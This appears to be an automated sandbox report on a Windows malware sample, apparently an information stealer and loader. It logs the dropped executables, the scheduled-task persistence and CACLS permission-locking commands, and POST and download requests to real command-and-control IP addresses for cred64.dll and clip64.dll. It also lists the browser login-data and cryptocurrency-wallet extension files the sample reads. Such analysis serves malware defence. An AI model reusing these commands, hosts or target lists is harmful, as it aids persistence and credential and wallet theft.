Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Nov. 4, 2023, 10:30 a.m. | Nov. 4, 2023, 10:39 a.m. |
-
-
-
-
-
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2372
-
-
-
-
aVUSfm8IjQeFpIY.exe "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe"
2996 -
cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY"
792-
schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY"
2848
-
-
-
-
-
3Tp00Kt.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3Tp00Kt.exe
2600
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2756
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
3036 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
2104-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2256 -
cacls.exe CACLS "explothe.exe" /P "test22:N"
2520 -
cacls.exe CACLS "explothe.exe" /P "test22:R" /E
2692 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2752 -
cacls.exe CACLS "..\fefffe8cea" /P "test22:N"
2864 -
cacls.exe CACLS "..\fefffe8cea" /P "test22:R" /E
2968
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
1532
-
-
-
-
6kH8UT7.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6kH8UT7.exe
2948
-
-
-
cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\is64.bat" "
2400
-
-
Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
resource name | AVI |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://193.233.255.73/loghub/master | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.91.124.1/theme/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.1/theme/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.1/theme/Plugins/clip64.dll |
request | POST http://193.233.255.73/loghub/master |
request | POST http://77.91.124.1/theme/index.php |
request | GET http://77.91.124.1/theme/Plugins/cred64.dll |
request | GET http://77.91.124.1/theme/Plugins/clip64.dll |
request | POST http://193.233.255.73/loghub/master |
request | POST http://77.91.124.1/theme/index.php |
description | explothe.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielpathgobddffflal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnpath |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\gjagmgpathdbbciopjhllkdnddhcglnemk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehpathddafch |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghpathoadd |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhgnbkkipaallpehbohjmkbjofjdmepath |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2OV7021.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\VZ6Dn81.exe |
file | C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4yv539Ea.exe |
file | C:\Users\test22\AppData\Local\Temp\7Nrg4I9t91Xs3Rru.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zr6og76.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6kH8UT7.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\is64.bat |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\po5KW36.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7Qv4re94.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5Jd8Hi6.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\OX3YJ37.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3Tp00Kt.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1aQ07Ww6.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\KJ6mf22.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
cmdline | /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
cmdline | schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe |
file | C:\Users\test22\AppData\Local\Temp\is64.bat |
file | C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |